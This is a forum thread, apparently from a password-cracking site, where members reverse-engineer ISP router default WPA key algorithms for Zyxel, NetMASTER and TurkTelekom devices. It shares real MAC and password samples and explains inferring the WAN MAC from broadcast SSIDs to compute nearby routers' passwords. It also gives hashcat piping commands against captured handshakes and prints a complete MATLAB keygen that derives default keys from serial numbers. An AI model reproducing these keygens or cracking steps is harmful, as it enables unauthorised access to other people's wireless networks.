Unpublished WPA key algorithms

elmasatanzenci

Active member
Feedback: 0 / 0 / 0
Joined
Sep 23, 2020
Messages
42
Reaction score
76
Credits
281
THIS!!!
I was working on this exact project, bur ran out of knowledge. I want to reverse engineer the default password generator. For the Zyxel EMG2926 typically used by videotron in quebec. I want a simple keygen that you feed it's WAN's Mac address and it prints the default password. I have a bunch of zyxel router default ssid/password/wan mac datas if it can help anyone. I ended up bricking a router trying to extract it's firmware. Got stuck there in my project and was hoping this forum thread would get revived.
For turktelekom zyxel modems key algorithm uses the serial number, not the mac. it also could be the case for videotron. maybe even close to tt algo.
 

gurgen

Active member
Feedback: 0 / 0 / 0
Joined
Dec 30, 2019
Messages
113
Reaction score
10
Credits
88

canerkafkef

Member
Feedback: 0 / 0 / 0
Joined
Mar 20, 2021
Messages
5
Reaction score
0
Credits
51
Attached netmaster algo, it is easy and known for years
This did not worked exactly, worked but results was wrong.
For example i have a few fc4ae9 router stock passwords.

mac = 'fc4ae9441327'

I checked fc4ae9441327 on this algo it created this pass = f7a9fae6 but this was wrong because true pass is c2c357a5

I tried 5 or 6 different macs.

Can you help me please where i made a mistake?

Thanks
 

elmasatanzenci

Active member
Feedback: 0 / 0 / 0
Joined
Sep 23, 2020
Messages
42
Reaction score
76
Credits
281
This did not worked exactly, worked but results was wrong.
For example i have a few fc4ae9 router stock passwords.

mac = 'fc4ae9441327'

I checked fc4ae9441327 on this algo it created this pass = f7a9fae6 but this was wrong because true pass is c2c357a5

I tried 5 or 6 different macs.

Can you help me please where i made a mistake?

Thanks
you should use the cm mac. not the wan or wlan mac. it works as it should.
 

canerkafkef

Member
Feedback: 0 / 0 / 0
Joined
Mar 20, 2021
Messages
5
Reaction score
0
Credits
51
you should use the cm mac. not the wan or wlan mac. it works as it should.

Thanks for your reply.
How can calculate CM? What is it?

For example i have some infos:
fc4ae9441327 NetMASTER Uydunet-1324 --- real passes-> c2c357a5
fc4ae971b308 Kablonet Netmaster-B303-G --- real passes-> 4c14a73c
fc4ae9b041d1 TURKSAT-KABLONET-41CC-2.4G --- real passes-> 5592499e

How can i verify theese with that python file?

i found this
But did not understand?


Thanks for your help
 

canerkafkef

Member
Feedback: 0 / 0 / 0
Joined
Mar 20, 2021
Messages
5
Reaction score
0
Credits
51
you should use the cm mac. not the wan or wlan mac. it works as it should.

--------------------------------------------------------------------------------------

I solved the system but i have a problem.

From Wan Mac it worked. fc4ae964f113 mac it gives the true pass. 42a371c5 but when i tried cm mac fc4ae964f111 it gives me wrong pass.
Can you give me info about cmac and wlan mac?
How can i found real wlan mac? in some sites it writes that wlan mac is consecutive.
But in this example Cm mac fc4ae964F111 Wan mac fc4ae964F113

How can i find right wan mac?
And why did you say use Cm mac?

Thanks
 

Attachments

  • 29003b1b1c6607c1d77cc81a7fbea432.jpg
    29003b1b1c6607c1d77cc81a7fbea432.jpg
    177.2 KB · Views: 37

elmasatanzenci

Active member
Feedback: 0 / 0 / 0
Joined
Sep 23, 2020
Messages
42
Reaction score
76
Credits
281
Thanks for your reply.
How can calculate CM? What is it?

For example i have some infos:
fc4ae9441327 NetMASTER Uydunet-1324 --- real passes-> c2c357a5
fc4ae971b308 Kablonet Netmaster-B303-G --- real passes-> 4c14a73c
fc4ae9b041d1 TURKSAT-KABLONET-41CC-2.4G --- real passes-> 5592499e

How can i verify theese with that python file?

i found this
But did not understand?


Thanks for your help
well you cant calculator real cm mac from the wan or wlan mac. best thing you can do is make a wordlist from fc4ae9000000 to fc4ae9ffffff. and use that instead.
 

elmasatanzenci

Active member
Feedback: 0 / 0 / 0
Joined
Sep 23, 2020
Messages
42
Reaction score
76
Credits
281
--------------------------------------------------------------------------------------

I solved the system but i have a problem.

From Wan Mac it worked. fc4ae964f113 mac it gives the true pass. 42a371c5 but when i tried cm mac fc4ae964f111 it gives me wrong pass.
Can you give me info about cmac and wlan mac?
How can i found real wlan mac? in some sites it writes that wlan mac is consecutive.
But in this example Cm mac fc4ae964F111 Wan mac fc4ae964F113

How can i find right wan mac?
And why did you say use Cm mac?

Thanks
sorry my bad. i meant wan mac. cm mac was for the wifi name calculation i wasx confused.. u need to use wan mac but you cant know wan mac from the wlan mac exactly. so u should make a wordlist to make sure you have it all.
 

canerkafkef

Member
Feedback: 0 / 0 / 0
Joined
Mar 20, 2021
Messages
5
Reaction score
0
Credits
51
sorry my bad. i meant wan mac. cm mac was for the wifi name calculation i wasx confused.. u need to use wan mac but you cant know wan mac from the wlan mac exactly. so u should make a wordlist to make sure you have it all.


Thanks for your all replies.
My english is not so good but I want to follow the rules that i want to write in english.

I want to share this and i have a question

  • Kablonet ağ adı, modemin CM MAC adresinin son 4 hanesini kullanıyor. Mesela modemin CM MAC adresi 11:22:33:44:55:66 ise, WiFi ağ adı NetMASTER Uydunet-5566 şeklinde hesaplanıyor. Bu bilgi önemsiz görünebilir ama bir sonraki bilgi için çok önemli bir bilgi açığı.
  • WiFi şifre algoritması cihazın WAN MAC adresi kullanılarak hesaplanıyor. Çoğu cihazda WAN ve WLAN adresleri birbirini takip ettiği için, WiFi MAC adresi ve ağ isminden WAN adresini hesaplamak mümkün. WiFi MAC adresini ve ağ ismini bağlanmadan da görebileceğiniz için, etraftaki şifresini değiştirmemiş bütün yeni model NetMASTER modemlerinin WiFi şifreleri hesaplanabiliyor. Modellere göre tehlike seviyesi şu şekildedir:
    • NetMASTER CBW-383ZN, NetMASTER Infinity 401 modelleri sadece WiFi Mac adresi ve ağ isminden hesaplanabiliyor. Çünkü WiFi MAC ile WAN MAC adresi ardışık
    • NetMASTER CBW-383Z4 modeli için 256 ihtimal var. Çünkü MAC adresi ardışık değil. Fakat ağ isminden geriye kalan 6 hanenin 4 hanesi hesaplanabiliyor. Bize denemek için 0x00-0xFF arasındaki ihtimaller kalıyor.
    • NetMASTER CBW-700V modelinde WiFi MAC ve WAN MAC adresleri tamamen farklı. Onların arasında bir ardışık sayı bulamadım. Bu yüzden bu modemler nispeten güvenli diyebiliriz.

First of all in these examples


fc4ae9441327 NetMASTER Uydunet-1324 --- real passes-> c2c357a5
fc4ae971b308 Kablonet Netmaster-B303-G --- real passes-> 4c14a73c

only last digit changes! in the first example wireless name is 1324 and also last 4 digit of mac is 1327 so first 3 digits are same. In this example WAN MAC is between 24-27 i tested a few time in different wirelesses

But in third example fc4ae9b041d1 TURKSAT-KABLONET-41CC-2.4G last 2 digits are different. How can i solve this you said that i shold make a list but how?
In the quete the writer says 256 possibilites.
fc4ae9b041?h?h like this? I wonder this. And how can edit netmaster-psk.py? For example I need fc4ae9b041?h?h how can extract passes in an out.txt file? We need the modify netmaster-psk.py

Thanks for all
 

SubZero5

Active member
Feedback: 0 / 0 / 0
Joined
Apr 23, 2020
Messages
284
Reaction score
19
Credits
3,051
Nowadays I see some NetMaster modems with changed MAC addresses...

I think a new firmware is pushed and the announced MacIDs are somehow shifted. I have some sample data but I am unavailable to analyze a firmware for an exact change methodology.

FC:4A:E9:xx:xx:xx became 18:48:59:yy:yy:yy
 

canerkafkef

Member
Feedback: 0 / 0 / 0
Joined
Mar 20, 2021
Messages
5
Reaction score
0
Credits
51
Nice, but you do know that GitHub exists for source code and projects alike :)
nice,

but i done that just for people to pipe it into hashcat instead of downloading the files, note that they are some users who
1, dont know how to pipe into hashcat
2, dont know how to compile
3, dont even use hashcat , and uses other programs , and those other programs do accept wordlists.


by the way, are u planing to release TurkTelekom for T versions ? aka tplink
Just use the pipe command |

gen.py | hashcat -m 2500 -a 0 cpature.hccapx


Hi i have a problem and i hope someone can help me.
I tried this method.
gen_ttnet_zyxel gcc -Ofast -o gen_ttnet_zyxel gen_ttnet_zyxel.c md5-fast-x8664.S

I have kali linux's lastest version.
I tried to create only 160Y! so i used this line static char* prefixes[] = {"160Y"};

chmod +x gen_ttnet_zyxel
then
./gen_ttnet_zyxel > zyxelwordlist.dic

I created a dictionary which was about 750 MB

But this list does not have all keys. I checked 10 times! i compiled 10 times to find what the problem is.
5D5276a1f1332 and 08134838433Ff passes must be in it but the created dictionary does not have them!
because 5D5276a1f1332 and 08134838433Ff passes are S160Y router's keys!

What is the problem do you think? Why the dict does not have right passwords?
I used this file

Thanks for your answers.
 

drsnooker

Active member
Contributor
VIP Member
Feedback: 0 / 0 / 0
Joined
Aug 1, 2020
Messages
448
Reaction score
727
Credits
4,064
I've converted the turktelecom keygen to matlab, so if you want to build your own python version it's pretty straight forward to do so. Added a few examples, so you can see if your code is on the right track.
Code:
function key=turkey_zyxel(sn)


% converted from c originally by gpuhash_me on hashkiller

% ref: https://forum.hashkiller.io/index.php?threads/unpublished-wpa-key-algorithms.19944/post-240582

% Default ESSID is TTNET_ZyXEL_XXXX or TurkTelecom_XXXXX

% Zyxel VMG3312-B10B and VGM3313-B10A




if nargin<1 % default serial number if none provided

    sn='S150Y13068675';

end


junk=['agnahaakeaksalmaltalvandanearmaskaspattbagbakbiebilbitblableblib'...

            'lyboabodbokbolbomborbrabrobrubudbuedaldamdegderdetdindisdraduedu'...

            'kdundypeggeieeikelgelvemueneengennertesseteettfeifemfilfinflofly'...

            'forfotfrafrifusfyrgengirglagregrogrygulhaihamhanhavheihelherhith'...

            'ivhoshovhuehukhunhushvaideildileinnionisejagjegjetjodjusjuvkaika'...

            'mkankarkleklikloknaknekokkorkrokrykulkunkurladlaglamlavletlimlin'...

            'livlomloslovluelunlurlutlydlynlyrlysmaimalmatmedmegmelmenmermilm'...

            'inmotmurmyemykmyrnamnednesnoknyenysoboobsoddodeoppordormoseospos'...

            'sostovnpaiparpekpenpepperpippopradrakramrarrasremrenrevrikrimrir'...

            'risrivromroprorrosrovrursagsaksalsausegseiselsensessilsinsivsjus'...

            'jyskiskoskysmisnesnusolsomsotspastistosumsussydsylsynsyvtaktalta'...

            'mtautidtietiltjatogtomtretuetunturukeullulvungurourtutevarvedveg'...

            'veivelvevvidvikvisvriyreyte'];

          

MD5_hash=hasher(sn,'MD5'); % results in 16 int values but in hex f49ab8d6ce27819152c99e926d1f1372

p='';

sum=0;

for n=1:16,

    byte=MD5_hash(n);

    c1=dec2hex(bitshift(byte,-4));  % High nibble converted to upper case hex by bitshift 4 => divide by 16

    c2=lower(dec2hex(mod(byte,16))); % low nibble converted to lower case hex

    if c1=='0' % remove leading zero by copying 2nd char into 1st.

        c1=c2;

    end

    p=[p c1 c2];

    sum=sum+double(c1)+double(c2);   %adds ASCII values together

end

% sum is 2006 for the default SN

% p would be F49aB8D6Ce27819152C99e926d1f1372


i=mod(sum,265);

if bitand(sum,1) %check sum is odd

    s1=[lower(dec2hex(double(junk(1+i*3)),2)) lower(dec2hex(double(junk(2+i*3)),2)) lower(dec2hex(double(junk(3+i*3)),2))];

else

    s1=[dec2hex(double(junk(1+i*3)),2) dec2hex(double(junk(2+i*3)),2) dec2hex(double(junk(3+i*3)),2)];

end

%s1 = '6D7572' for default serial number (upper case hex conversion from the ascii values of the letters picked out from junk



s2=[p(1) s1(1:2) p(2:3) s1(3:4) p(4:6) s1(5:6) p(7:end)]; % weird alternating stitching of the hex digest and the junk hex

%s2 is F6D4975aB872D6Ce27819152C99e926d1f1372 for the default, note the mixed case


MD5_hash2=hasher(s2,'MD5');

hex_digest='';

for n=1:16,

    hex_byte=dec2hex(MD5_hash2(n),2);  %force all upper case

    if hex_byte(1)=='0'

        hex_byte(1)=hex_byte(2); % copy next char over if leading zero;

    end

    hex_digest=[hex_digest hex_byte];

end

for n=2:2:32

    hex_digest(n)=lower(hex_digest(n)); % alternate lower case and upper case

end


%default hash =       52AeC8568b91E1DcBcA5142e95Fd31F5

%correct password for default sn = 1DcBcA5142e95

key=hex_digest(14:26); % select the key from the 14th char to the 26th
 
Last edited by a moderator:

drsnooker

Active member
Contributor
VIP Member
Feedback: 0 / 0 / 0
Joined
Aug 1, 2020
Messages
448
Reaction score
727
Credits
4,064
Thanks Dawbs. Here's the matlab conversion of Zykgen (keygen for the Zyxel VMG8823-B50B).
Note that I've completely gotten rid of the bibbidi bobbidi boo functions and some others after I figured out what they were actually doing. Again should be pretty easy to convert to python if you are so inclined. But easier to handle than the GOlang it was written in.
 

Attachments

  • zykgen.zip
    1.8 KB · Views: 37

drsnooker

Active member
Contributor
VIP Member
Feedback: 0 / 0 / 0
Joined
Aug 1, 2020
Messages
448
Reaction score
727
Credits
4,064
If anybody still has a copy of the gen_telus.py that was attached on message 21 please send it to me. I want to see what else ZyXel had up there sleaves when it comes to generating those passwords.
 
Top